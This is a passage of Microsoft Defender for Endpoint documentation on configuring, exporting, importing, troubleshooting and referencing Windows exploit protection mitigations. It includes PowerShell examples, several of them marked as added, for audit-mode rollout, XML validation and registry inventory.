Arbitrary code guard (ACG) | Prevents the introduction of non-image-backed executable code and prevents code pages from being modified. Can optionally allow thread opt-out and allow remote downgrade (configurable only with PowerShell). | App-level only | Yes
Block low integrity images | Prevents the loading of images marked with Low Integrity. | App-level only | Yes
Block remote images | Prevents loading of images from remote devices. | App-level only | No
Block untrusted fonts | Prevents loading any GDI-based fonts not installed in the system fonts directory, notably fonts from the web. | App-level only | Yes
Code integrity guard | Restricts image loading to images signed by Microsoft, WHQL, or higher. Can optionally allow Microsoft Store signed images. | App-level only | Yes
Disable extension points | Disables various extensibility mechanisms that allow DLL injection into all processes, such as AppInit DLLs, window hooks, and Winsock service providers. | App-level only | No
Disable Win32k system calls | Prevents an app from using the Win32k system call table. | App-level only | Yes
Don't allow child processes | Prevents an app from creating child processes. | App-level only | Yes
Export address filtering (EAF) | Detects dangerous operations being resolved by malicious code. Can optionally validate access by modules commonly used by exploits. | App-level only | Yes
Import address filtering (IAF) | Detects dangerous operations being resolved by malicious code. | App-level only | Yes
Simulate execution (SimExec) | Ensures that calls to sensitive APIs return to legitimate callers. Only configurable for 32-bit (x86) applications. Not compatible with ACG. | App-level only | Yes
Validate API invocation (CallerCheck) | Ensures that sensitive APIs are invoked by legitimate callers. Only configurable for 32-bit (x86) applications. Not compatible with ACG. | App-level only | Yes
Validate handle usage | Causes an exception to be raised on any invalid handle references. | App-level only | No
Validate image dependency integrity | Enforces code signing for Windows image dependency loading. | App-level only | No
Validate stack integrity (StackPivot) | Ensures that the stack hasn't been redirected for sensitive APIs. Not compatible with ACG. | App-level only | Yes

) Important

If you add an app to the Program settings section and configure individual
mitigation settings there, they will be honored above the configuration for the
same mitigations specified in the System settings section. The following matrix and
examples help to illustrate how defaults work:

Enabled in Program settings | Enabled in System settings | Behavior
--- | --- | ---
Yes | No | As defined in Program settings
Yes | Yes | As defined in Program settings
No | Yes | As defined in System settings
No | No | Default as defined in Use default option

Example 1: Mikael configures Data Execution Prevention (DEP) in the System
settings section to be Off by default. Mikael then adds the app test.exe to the
Program settings section. In the options for that app, under Data Execution
Prevention (DEP), he enables the Override system settings option and sets
the switch to On. There are no other apps listed in the Program settings
section. The result will be that DEP only will be enabled for test.exe. All other
apps will not have DEP applied.

Example 2: Josie configures Data Execution Prevention (DEP) in the System
settings section to be Off by default. Josie then adds the app test.exe to the
Program settings section. In the options for that app, under Data Execution
Prevention (DEP), she enables the Override system settings option and sets
the switch to On. Josie also adds the app miles.exe to the Program settings
section and configures Control flow guard (CFG) to On. She doesn't enable
the Override system settings option for DEP or any other mitigations for that
app. The result will be that DEP will be enabled for test.exe. DEP will not be
enabled for any other app, including miles.exe. CFG will be enabled for
miles.exe.

7 Note

If you have found any issues in this article, you can report it directly to a Windows
Server/Windows Client partner or use the Microsoft technical support numbers for
your country/region.

Configure system-level mitigations with the Windows Security app

1. Open the Windows Security app by selecting the shield icon in the task bar or
searching the start menu for Windows Security.

2. Select the App & browser control tile (or the app icon on the left menu bar) and
then select Exploit protection.

3. Under the System settings section, find the mitigation you want to configure and
select one of the following. Apps that aren't configured individually in the Program
settings section will use the settings configured here:

On by default - The mitigation is enabled for apps that don't have this
mitigation set in the app-specific Program settings section
Off by default - The mitigation is disabled for apps that don't have this
mitigation set in the app-specific Program settings section
Use default - The mitigation is either enabled or disabled, depending on the
default configuration that is set up by Windows 10 or Windows 11
installation; the default value (On or Off) is always specified next to the Use
default label for each mitigation

7 Note
You may see a User Account Control window when changing some settings.
Enter administrator credentials to apply the setting.

Changing some settings may require a restart.

4. Repeat this for all the system-level mitigations you want to configure.

5. Go to the Program settings section and choose the app you want to apply
mitigations to:
a. If the app you want to configure is already listed, select it and then select Edit
b. If the app isn't listed, at the top of the list select Add program to customize and
then choose how you want to add the app:

Use Add by program name to have the mitigation applied to any running
process with that name. You must specify a file with an extension. You can
enter a full path to limit the mitigation to only the app with that name in
that location.
Use Choose exact file path to use a standard Windows Explorer file picker
window to find and select the file you want.

6. After selecting the app, you'll see a list of all the mitigations that can be applied. To
enable the mitigation, select the check box and then change the slider to On.
Select any additional options. Choosing Audit will apply the mitigation in audit
mode only. You will be notified if you need to restart the process or app, or if you
need to restart Windows.

7. Repeat these steps for all the apps and mitigations you want to configure. Select
Apply when you're done setting up your configuration.

You can now export these settings as an XML file or continue on to configure app-
specific mitigations.

Exporting the configuration as an XML file allows you to copy the configuration from
one device onto other devices.

PowerShell reference
You can use the Windows Security app to configure Exploit protection, or you can use
PowerShell cmdlets.

The configuration settings that were most recently modified will always be applied -
regardless of whether you use PowerShell or Windows Security. This means that if you
use the app to configure a mitigation, then use PowerShell to configure the same
mitigation, the app will update to show the changes you made with PowerShell. If you
were to then use the app to change the mitigation again, that change would apply.

) Important

Any changes that are deployed to a device through Group Policy will override the
local configuration. When setting up an initial configuration, use a device that will
not have a Group Policy configuration applied to ensure your changes aren't
overridden.

You can use the PowerShell verb Get or Set with the cmdlet ProcessMitigation. Using
Get lists the current configuration status of any mitigations that have been enabled
on the device. Add the -Name parameter and the app's executable to see mitigations for
just that app:

PowerShell

Get-ProcessMitigation -Name processName.exe

) Important

System-level mitigations that haven't been configured show a status of NOTSET.

For system-level settings, NOTSET indicates the default setting for that mitigation
has been applied.

For app-level settings, NOTSET indicates the system-level setting for the mitigation
will be applied.

The default setting for each system-level mitigation can be seen in the Windows
Security app.

Use Set to configure each mitigation in the following format:

PowerShell

Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,<mitigation or options>

Where:

<Scope>:
-Name to indicate the mitigations should be applied to a specific app. Specify the app's executable after this flag.
-System to indicate the mitigation should be applied at the system level

<Action>:
-Enable to enable the mitigation
-Disable to disable the mitigation

<Mitigation>:
The mitigation's keyword as defined in the PowerShell reference table below, along
with any suboptions. Each mitigation is separated with a comma.

For example, to enable the Data Execution Prevention (DEP) mitigation with ATL thunk
emulation for an executable called testing.exe in the folder C:\Apps\LOB\tests, and to
prevent that executable from creating child processes, you'd use the following
command:

PowerShell

Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable DEP, EmulateAtlThunks, DisallowChildProcessCreation

) Important

Separate each mitigation option with commas.

If you wanted to apply DEP at the system level, you'd use the following command:

PowerShell

Set-ProcessMitigation -System -Enable DEP

To disable mitigations, you can replace -Enable with -Disable. However, for app-level
mitigations, this forces the mitigation to be disabled only for that app.

If you need to restore the mitigation back to the system default, you need to include the
-Remove parameter as well, as in the following example:

PowerShell

Set-ProcessMitigation -Name test.exe -Remove -Disable DEP

You can also set some mitigations to audit mode. Instead of using the enforcing keyword
for the mitigation, use the audit mode keyword as specified in the PowerShell reference
table below.

For example, to enable Arbitrary Code Guard (ACG) in audit mode for the testing.exe
used previously, you'd use the following command:

PowerShell

Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable AuditDynamicCode

You can disable audit mode by using the same command but replacing -Enable with
-Disable.
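
The warning at the top of this article says to test in audit mode before deploying, and
the Windows Security steps end by exporting the configuration as XML. This added
PowerShell example, which is not code from the article, does that from the command line
for a constructed plan covering two placeholder apps: it applies only the audit keywords
from the reference table, reports which requested mitigations have no audit mode and are
therefore left unapplied, then exports the device's current settings to XML with
Get-ProcessMitigation -RegistryConfigFilePath and lists the app entries found in the
file. The app names, the plan, and the XML inspection logic are assumptions. Run it
elevated.

```powershell
# Added example (not from the original article): stage a configuration for several apps
# in audit mode, then export the result as XML for deployment. Only mitigations that have
# an audit keyword are staged, so nothing is enforced before it has been tested.

#Requires -RunAsAdministrator

# Enforce keyword -> audit keyword (pairs taken from the PowerShell reference table).
$AuditFor = @{
    DynamicCode                  = 'AuditDynamicCode'
    DisallowChildProcessCreation = 'AuditChildProcess'
    DisableWin32kSystemCalls     = 'AuditSystemCall'
    DisableNonSystemFonts        = 'AuditFont'
    BlockLowLabel                = 'AuditImageLoad'
}

# Desired end state per app (constructed sample; the app names are placeholders).
$Desired = @{
    'lobviewer.exe'  = @('DynamicCode', 'DisallowChildProcessCreation', 'CFG')
    'legacytool.exe' = @('DisableWin32kSystemCalls', 'DisableNonSystemFonts', 'DEP')
}

function Split-ByAuditSupport {
    # Partition a mitigation list into the audit keywords to apply now and the
    # enforce-only keywords (no audit mode) that need a separate pilot decision.
    param([string[]]$Mitigations)
    $audit = @(); $noAudit = @()
    foreach ($m in $Mitigations) {
        if ($AuditFor.ContainsKey($m)) { $audit += $AuditFor[$m] } else { $noAudit += $m }
    }
    [pscustomobject]@{ Audit = $audit; NoAudit = $noAudit }
}

function Start-AuditRollout {
    param([hashtable]$Plan)
    foreach ($app in $Plan.Keys) {
        $parts = Split-ByAuditSupport -Mitigations $Plan[$app]
        if ($parts.Audit.Count -gt 0) {
            Set-ProcessMitigation -Name $app -Enable $parts.Audit
            Write-Host "$app : auditing $($parts.Audit -join ', ')"
        }
        if ($parts.NoAudit.Count -gt 0) {
            # Cannot be audited from PowerShell; enforce these on a pilot ring instead.
            Write-Warning "$app : no audit mode for $($parts.NoAudit -join ', '); not applied"
        }
    }
}

function Export-Configuration {
    param([string]$Path)
    # Exports the device's current exploit protection settings to an XML file.
    Get-ProcessMitigation -RegistryConfigFilePath $Path
    # Show what was captured: every element carrying an Executable attribute is one app
    # entry (XPath kept generic so it does not depend on the root element name).
    [xml]$doc = Get-Content -Path $Path -Raw
    foreach ($app in $doc.SelectNodes('//*[@Executable]')) {
        $settings = foreach ($n in $app.ChildNodes) {
            $attrs = ($n.Attributes | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join ' '
            "$($n.Name)($attrs)"
        }
        [pscustomobject]@{ Executable = $app.Executable; Settings = ($settings -join '; ') }
    }
}

Start-AuditRollout -Plan $Desired
Export-Configuration -Path "$env:TEMP\ep-audit-stage.xml" | Format-Table -AutoSize -Wrap
```

The exported file is the artifact to review and then hand to Intune, Configuration
Manager, or Group Policy; the listing at the end is a quick check that it contains the
apps you staged and only the audit keywords, before any enforcing keyword is swapped in.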

PowerShell reference table


This table lists the PowerShell cmdlets (and associated audit mode cmdlet) that can be
used to configure each mitigation.

ノ Expand table

Mitigation Applies PowerShell cmdlets Audit mode cmdlet


to

Mitigation                                      | Applies to           | PowerShell cmdlets                                           | Audit mode cmdlet
------------------------------------------------|----------------------|--------------------------------------------------------------|---------------------------------------
Control flow guard (CFG)                        | System and app-level | CFG, StrictCFG, SuppressExports                              | Audit not available
Data Execution Prevention (DEP)                 | System and app-level | DEP, EmulateAtlThunks                                        | Audit not available
Force randomization for images (Mandatory ASLR) | System and app-level | ForceRelocateImages                                          | Audit not available
Randomize memory allocations (Bottom-Up ASLR)   | System and app-level | BottomUp, HighEntropy                                        | Audit not available
Validate exception chains (SEHOP)               | System and app-level | SEHOP, SEHOPTelemetry                                        | Audit not available
Validate heap integrity                         | System and app-level | TerminateOnError                                             | Audit not available
Arbitrary code guard (ACG)                      | App-level only       | DynamicCode                                                  | AuditDynamicCode
Block low integrity images                      | App-level only       | BlockLowLabel                                                | AuditImageLoad
Block remote images                             | App-level only       | BlockRemoteImages                                            | Audit not available
Block untrusted fonts                           | App-level only       | DisableNonSystemFonts                                        | AuditFont, FontAuditOnly
Code integrity guard                            | App-level only       | BlockNonMicrosoftSigned, AllowStoreSigned                    | AuditMicrosoftSigned, AuditStoreSigned
Disable extension points                        | App-level only       | ExtensionPoint                                               | Audit not available
Disable Win32k system calls                     | App-level only       | DisableWin32kSystemCalls                                     | AuditSystemCall
Do not allow child processes                    | App-level only       | DisallowChildProcessCreation                                 | AuditChildProcess
Export address filtering (EAF)                  | App-level only       | EnableExportAddressFilterPlus, EnableExportAddressFilter [1] | Audit not available [2]
Import address filtering (IAF)                  | App-level only       | EnableImportAddressFilter                                    | Audit not available [2]
Simulate execution (SimExec)                    | App-level only       | EnableRopSimExec                                             | Audit not available [2]
Validate API invocation (CallerCheck)           | App-level only       | EnableRopCallerCheck                                         | Audit not available [2]
Validate handle usage                           | App-level only       | StrictHandle                                                 | Audit not available
Validate image dependency integrity             | App-level only       | EnforceModuleDependencySigning                               | Audit not available
Validate stack integrity (StackPivot)           | App-level only       | EnableRopStackPivot                                          | Audit not available [2]

[1]: Use the following format to enable EAF modules for DLLs for a process:

PowerShell

Set-ProcessMitigation -Name processName.exe -Enable EnableExportAddressFilterPlus -EAFModules dllName1.dll,dllName2.dll

[2]: Audit for this mitigation is not available via PowerShell cmdlets.
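The following is an added example, not part of the original article, showing how the table above is used in practice: app-level mitigations that have an audit cmdlet are staged audit-first, one mitigation without an audit mode is enforced, the stored policy is read back, and the audit events are collected. It assumes an elevated PowerShell session on Windows 10 or Windows 11 with the built-in ProcessMitigations module; LegacyViewer.exe is a placeholder for your own application, and the Security-Mitigations event channel names are taken from Event Viewer on a current build.

```powershell
# Added example (not part of the original article): audit-first rollout of app-level
# mitigations for one executable. Assumptions: elevated session, ProcessMitigations module
# present, "LegacyViewer.exe" is a placeholder for the application under test.

$target = 'LegacyViewer.exe'

# Mitigations that have an audit cmdlet in the table go in as audit-only first, so an
# incompatibility shows up as an event instead of a crash.
Set-ProcessMitigation -Name $target -Enable AuditDynamicCode, AuditChildProcess, AuditSystemCall, AuditImageLoad

# Mitigations without an audit mode can only be tested by enforcing them. Start with
# remote image loads; add the ROP checks (EnableRopSimExec etc.) once the app has been exercised.
Set-ProcessMitigation -Name $target -Enable BlockRemoteImages

# EAF with per-module filtering uses the footnote [1] syntax.
Set-ProcessMitigation -Name $target -Enable EnableExportAddressFilterPlus -EAFModules kernel32.dll,ntdll.dll

# Read back what is now stored for this name. The sub-objects mirror the Windows Security
# groupings; property names follow the ProcessMitigations module output.
$policy = Get-ProcessMitigation -Name $target
$policy.DynamicCode    # ACG: Enable / Audit
$policy.ChildProcess   # child process creation: Enable / Audit
$policy.ImageLoad      # remote and low-integrity image load settings

# Settings apply when the process next starts. After exercising the app, pull the audit
# events from the Security-Mitigations channels and keep those that name the target.
$channels = 'Microsoft-Windows-Security-Mitigations/UserMode',
            'Microsoft-Windows-Security-Mitigations/KernelMode'
Get-WinEvent -FilterHashtable @{ LogName = $channels; StartTime = (Get-Date).AddDays(-1) } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match [regex]::Escape($target) } |
    Select-Object TimeCreated, Id, Message |
    Format-List
```

Once a full run of the application produces no audit events for a mitigation, switch that mitigation from its Audit* value to the enforcing value in the same column of the table; the mitigations marked "Audit not available" have to be validated by enforcing them on a test device.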

Customize the notification


For more information about customizing the notification when a rule is triggered and
blocks an app or file, see Windows Security.

See also
Protect devices from exploits
Evaluate exploit protection
Enable exploit protection
Import, export, and deploy exploit protection configurations

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Import, export, and deploy exploit protection configurations
Article • 06/29/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Exploit protection helps protect devices from malware that uses exploits to spread and
infect. It consists of a number of mitigations that can be applied at either the operating
system level or at the individual app level.

You use the Windows Security app or PowerShell to create a set of mitigations (known
as a configuration). You can then export this configuration as an XML file and share it
with multiple devices on your network. Then, they all have the same set of mitigation
settings.

Create and export a configuration file


Before you export a configuration file, you need to ensure you have the correct settings.
First, configure exploit protection on a single, dedicated device. See Customize exploit
protection for more information about configuring mitigations.

When you've configured exploit protection to your desired state (including both system-
level and app-level mitigations), you can export the file using either the Windows
Security app or PowerShell.

Use the Windows Security app to export a configuration file

1. Open the Windows Security app by selecting the shield icon in the task bar. Or,
search the start menu for Windows Security.

2. Select the App & browser control tile (or the app icon on the left menu bar) and
then select Exploit protection settings:

3. At the bottom of the Exploit protection section, select Export settings. Choose the
location and name of the XML file where you want the configuration to be saved.

) Important

If you want to use Default configuration, use the settings "On by default"
instead of "Use Default (On)" to get the settings exported correctly on the
XML file.

7 Note

When you export the settings, all settings for both app-level and system-level
mitigations are saved. This means you don't need to export a file from both
the System settings and Program settings sections (either section will export
all settings).

Use PowerShell to export a configuration file


1. Type powershell in the Start menu, right-click Windows PowerShell and select Run
as administrator.

2. Enter the following cmdlet:

PowerShell

Get-ProcessMitigation -RegistryConfigFilePath filename.xml

Change filename to any name or location of your choosing.

Example command:

PowerShell

Get-ProcessMitigation -RegistryConfigFilePath C:\ExploitConfigfile.xml

Import a configuration file


You can import an exploit protection configuration file that you've previously created.
You can only use PowerShell to import the configuration file.

After importing, the settings are applied immediately and can be reviewed in the
Windows Security app. Importing applies the entries in the file; it doesn't reliably
remove mitigations already configured for executables the file doesn't cover. If you need
to clear existing settings first, see Troubleshoot exploit protection mitigations.

Use PowerShell to import a configuration file


1. Type powershell in the Start menu, right-click Windows PowerShell and select Run
as administrator.
2. Enter the following cmdlet:

PowerShell

Set-ProcessMitigation -PolicyFilePath filename.xml

Change filename to the location and name of the exploit protection XML file.

Example command:

PowerShell

Set-ProcessMitigation -PolicyFilePath C:\ExploitConfigfile.xml

) Important

Ensure you import a configuration file that is created specifically for exploit
protection.
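As an added example that is not part of the original article, the script below runs the export and import steps end to end and adds the check a practitioner wants in between: the exported XML is parsed once, its root element is verified to be one of the two forms used by the sample files in this documentation, and the per-application entries are summarised before the file is copied to a share and imported on a test device. It assumes an elevated session; C:\ExploitConfigfile.xml is the path used in this article and \\Server\Share\ExploitProtection is a placeholder.

```powershell
# Added example (not part of the original article): export, validate, summarise, import.
# Assumptions: elevated session; the share path below is a placeholder.

$exportPath = 'C:\ExploitConfigfile.xml'
Get-ProcessMitigation -RegistryConfigFilePath $exportPath

# Parse the file once so a truncated or hand-edited copy fails here, not on every client.
[xml]$config = Get-Content -Path $exportPath -Raw

# Both root element names that appear in this documentation's sample files are accepted.
if ($config.DocumentElement.Name -notin @('MitigationPolicy', 'root')) {
    throw "Not an exploit protection configuration: root element is <$($config.DocumentElement.Name)>"
}

# One row per executable: which mitigation groups (DEP, ASLR, Payload, ImageLoad, ...) it sets.
$config.DocumentElement.AppConfig | ForEach-Object {
    [pscustomobject]@{
        Executable = $_.Executable
        Groups     = ($_.ChildNodes | Where-Object NodeType -eq 'Element' |
                      Select-Object -ExpandProperty Name) -join ', '
    }
} | Sort-Object Executable | Format-Table -AutoSize

# Group Policy deployment needs the file on a location every target can read.
$sharePath = '\\Server\Share\ExploitProtection\ExploitConfigfile.xml'
Copy-Item -Path $exportPath -Destination $sharePath

# Import the same file locally on a test device. Entries absent from the file are not
# reliably removed by this step; clear them first if that matters (see Troubleshoot).
Set-ProcessMitigation -PolicyFilePath $exportPath
Get-ProcessMitigation -Name ($config.DocumentElement.AppConfig | Select-Object -First 1).Executable
```

The summary table is the quickest way to spot an executable you did not intend to configure, which is the usual reason an exported configuration behaves differently on other devices than on the one it was built on.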

Manage or deploy a configuration


You can use Group Policy to deploy the configuration you've created to multiple devices
in your network.

) Important

When you deploy the configuration using Group Policy, all devices that will use the
configuration must be able to access the configuration XML file. Ensure you place
the file in a shared location.

Use Group Policy to distribute the configuration


1. On your Group Policy management device, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and Edit.

2. In the Group Policy Management Editor, go to Computer configuration and select
Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Exploit Guard >
Exploit protection.

4. Double-click Use a common set of Exploit protection settings and set the option
to Enabled.

5. In the Options: section, enter the location and file name of the Exploit protection
configuration file that you want to use, such as in the following examples:

C:\MitigationSettings\Config.XML

\\Server\Share\Config.xml
https://localhost:8080/Config.xml

C:\ExploitConfigfile.xml

6. Select OK and deploy the updated GPO as you normally do.

See also
Protect devices from exploits
Evaluate exploit protection
Enable exploit protection
Configure and audit exploit protection mitigations



Troubleshoot exploit protection mitigations
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

When you create a set of exploit protection mitigations (known as a configuration), you
might find that the configuration export and import process does not remove all
unwanted mitigations.

You can manually remove unwanted mitigations in Windows Security, or you can use the
following process to remove all mitigations and then import a baseline configuration file
instead. The script in step 1 must run as an administrator. It strips the exploit
protection values (MitigationOptions, MitigationAuditOptions, EAFModules and path
filters) from every entry under Image File Execution Options and from the system-wide
kernel key, and deletes an entry only when nothing else is left in it. Try it on a test
device first, and expect the system-wide change to take effect after a restart.

1. Remove all process mitigations with this PowerShell script:

PowerShell

# Check if Admin-Privileges are available
function Test-IsAdmin {
    ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
}

# Delete ExploitGuard ProcessMitigations for a given key in the registry.
# If no other settings exist under the specified key, the key is deleted as well.
function Remove-ProcessMitigations([Object] $Key, [string] $Name) {
    Try {
        if ($Key.GetValue("MitigationOptions")) {
            Write-Host "Removing MitigationOptions for: " $Name
            Remove-ItemProperty -Path $Key.PSPath -Name "MitigationOptions" -ErrorAction Stop
        }
        if ($Key.GetValue("MitigationAuditOptions")) {
            Write-Host "Removing MitigationAuditOptions for: " $Name
            Remove-ItemProperty -Path $Key.PSPath -Name "MitigationAuditOptions" -ErrorAction Stop
        }
        if ($Key.GetValue("EAFModules")) {
            Write-Host "Removing EAFModules for: " $Name
            Remove-ItemProperty -Path $Key.PSPath -Name "EAFModules" -ErrorAction Stop
        }

        # Remove the FilterFullPath value if there is nothing else
        if (($Key.SubKeyCount -eq 0) -and ($Key.ValueCount -eq 1) -and ($Key.GetValue("FilterFullPath"))) {
            Remove-ItemProperty -Path $Key.PSPath -Name "FilterFullPath" -ErrorAction Stop
        }

        # If the key is empty now, delete it
        if (($Key.SubKeyCount -eq 0) -and ($Key.ValueCount -eq 0)) {
            Write-Host "Removing empty Entry: " $Name
            Remove-Item -Path $Key.PSPath -ErrorAction Stop
        }
    }
    Catch {
        # $Name is the entry this function was given, including path-filter entries
        Write-Host "ERROR:" $_.Exception.Message "- at ($Name)"
    }
}

# Delete all ExploitGuard ProcessMitigations
function Remove-All-ProcessMitigations {
    if (!(Test-IsAdmin)) {
        throw "ERROR: No Administrator-Privileges detected!"
    }

    Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | ForEach-Object {
        $MitigationItem = $_
        $MitigationItemName = $MitigationItem.PSChildName

        Try {
            Remove-ProcessMitigations $MitigationItem $MitigationItemName

            # "UseFilter" indicates full path filters may be present
            if ($MitigationItem.GetValue("UseFilter")) {
                Get-ChildItem -Path $MitigationItem.PSPath | ForEach-Object {
                    $FullPathItem = $_
                    if ($FullPathItem.GetValue("FilterFullPath")) {
                        $Name = $MitigationItemName + "-" + $FullPathItem.GetValue("FilterFullPath")
                        Write-Host "Removing FullPathEntry: " $Name
                        Remove-ProcessMitigations $FullPathItem $Name
                    }
                }

                # If no subkeys are left, the "UseFilter" value can be removed as well
                if ($MitigationItem.SubKeyCount -eq 0) {
                    Remove-ItemProperty -Path $MitigationItem.PSPath -Name "UseFilter" -ErrorAction Stop
                }
            }
            if (($MitigationItem.SubKeyCount -eq 0) -and ($MitigationItem.ValueCount -eq 0)) {
                Write-Host "Removing empty Entry: " $MitigationItemName
                Remove-Item -Path $MitigationItem.PSPath -ErrorAction Stop
            }
        }
        Catch {
            Write-Host "ERROR:" $_.Exception.Message "- at ($MitigationItemName)"
        }
    }
}

# Delete all ExploitGuard System-wide Mitigations
function Remove-All-SystemMitigations {
    if (!(Test-IsAdmin)) {
        throw "ERROR: No Administrator-Privileges detected!"
    }

    $Kernel = Get-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\kernel"

    Try {
        if ($Kernel.GetValue("MitigationOptions")) {
            Write-Host "Removing System MitigationOptions"
            Remove-ItemProperty -Path $Kernel.PSPath -Name "MitigationOptions" -ErrorAction Stop
        }
        if ($Kernel.GetValue("MitigationAuditOptions")) {
            Write-Host "Removing System MitigationAuditOptions"
            Remove-ItemProperty -Path $Kernel.PSPath -Name "MitigationAuditOptions" -ErrorAction Stop
        }
    }
    Catch {
        Write-Host "ERROR:" $_.Exception.Message "- System"
    }
}

Remove-All-ProcessMitigations
Remove-All-SystemMitigations

2. Create and import an XML configuration file with the following default mitigations,
as described in Import, export, and deploy Exploit Protection configurations:
XML

<?xml version="1.0" encoding="UTF-8"?>
<root>
    <SystemConfig/>
    <AppConfig Executable="ExtExport.exe">
        <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
    </AppConfig>
    <AppConfig Executable="ie4uinit.exe">
        <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
    </AppConfig>
    <AppConfig Executable="ieinstal.exe">
        <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
    </AppConfig>
    <AppConfig Executable="ielowutil.exe">
        <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
    </AppConfig>
    <AppConfig Executable="ieUnatt.exe">
        <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
    </AppConfig>
    <AppConfig Executable="iexplore.exe">
        <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
    </AppConfig>
    <AppConfig Executable="mscorsvw.exe">
        <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
    </AppConfig>
    <AppConfig Executable="msfeedssync.exe">
        <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
    </AppConfig>
    <AppConfig Executable="mshta.exe">
        <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
    </AppConfig>
    <AppConfig Executable="ngen.exe">
        <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
    </AppConfig>
    <AppConfig Executable="ngentask.exe">
        <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
    </AppConfig>
    <AppConfig Executable="PresentationHost.exe">
        <DEP Enable="true" OverrideDEP="false" EmulateAtlThunks="false"/>
        <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"
              OverrideBottomUp="false" HighEntropy="true" BottomUp="true"/>
        <SEHOP Enable="true" OverrideSEHOP="false" TelemetryOnly="false"/>
        <Heap OverrideHeap="false" TerminateOnError="true"/>
    </AppConfig>
    <AppConfig Executable="PrintDialog.exe">
        <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
    </AppConfig>
    <AppConfig Executable="PrintIsolationHost.exe"/>
    <AppConfig Executable="runtimebroker.exe">
        <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
    </AppConfig>
    <AppConfig Executable="splwow64.exe"/>
    <AppConfig Executable="spoolsv.exe"/>
    <AppConfig Executable="svchost.exe"/>
    <AppConfig Executable="SystemSettings.exe">
        <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
    </AppConfig>
</root>

If you haven't already, it's a good idea to download and use the Windows Security
Baselines to complete your Exploit protection customization.

Related topics
Protect devices from exploits
Evaluate exploit protection
Enable exploit protection
Configure and audit exploit protection mitigations
Import, export, and deploy exploit protection configurations



Exploit protection reference
Article • 11/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Exploit protection provides advanced protections for applications that enterprise admins
and IT pros can apply after a developer has compiled and distributed software.

This article helps you understand how exploit protection works, both at the policy level
and at the individual mitigation level, to help you successfully build and apply exploit
protection policies.

How mitigations are applied


Exploit protection mitigations are applied per application.

Mitigations are configured through a registry entry for each program that you configure
protections for. These settings are stored in the MitigationOptions registry value for
each program (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\<ImageFileName>\MitigationOptions).

They take effect when you restart the program, and remain effective until you change
them and restart the program again.

) Important

Image File Execution Options only lets you specify a file name or path, not a version
number, architecture, or any other differentiator. Target mitigations at apps that have
unique names or paths, and apply them only on devices where you've tested that version
and that architecture of the application.

If you configure exploit protection mitigations using an XML configuration file through
PowerShell, Group Policy, or MDM, the individual registry settings are written for you
when the XML file is processed.
When the policy distributing the XML file is no longer enforced, the settings it deployed
aren't automatically removed. To remove exploit protection settings, export the XML
configuration from a clean Windows 10 or Windows 11 device and deploy that new XML file.
Alternatively, Microsoft provides an XML file as part of the Windows Security Baselines
for resetting exploit protection settings.
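To see what the policy left behind on a device, the added example below (not part of the original article) reads the registry locations named in this section directly: every Image File Execution Options entry that carries MitigationOptions or MitigationAuditOptions, and the system-wide values under the Session Manager\kernel key. It is read-only and needs no elevation; the ConvertTo-HexString and Get-StoredProcessMitigation function names are this example's own.

```powershell
# Added example (not part of the original article): inventory of stored exploit protection
# values, read straight from the registry paths this article describes. Read-only.

# Render REG_BINARY or numeric values as hex so entries can be compared across devices.
function ConvertTo-HexString($Value) {
    if ($null -eq $Value) { return $null }
    if ($Value -is [byte[]]) { return ($Value | ForEach-Object { $_.ToString('X2') }) -join '' }
    return ('0x{0:X}' -f $Value)
}

$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# Only IFEO subkeys that carry mitigation data are reported; most entries under this key
# are unrelated (debugger settings and so on) and are skipped.
function Get-StoredProcessMitigation {
    Get-ChildItem -Path $ifeo | ForEach-Object {
        $key   = $_
        $opts  = $key.GetValue('MitigationOptions')
        $audit = $key.GetValue('MitigationAuditOptions')
        if ($null -ne $opts -or $null -ne $audit) {
            [pscustomobject]@{
                Executable        = $key.PSChildName
                MitigationOptions = ConvertTo-HexString $opts
                AuditOptions      = ConvertTo-HexString $audit
                EAFModules        = ($key.GetValue('EAFModules') -join ';')
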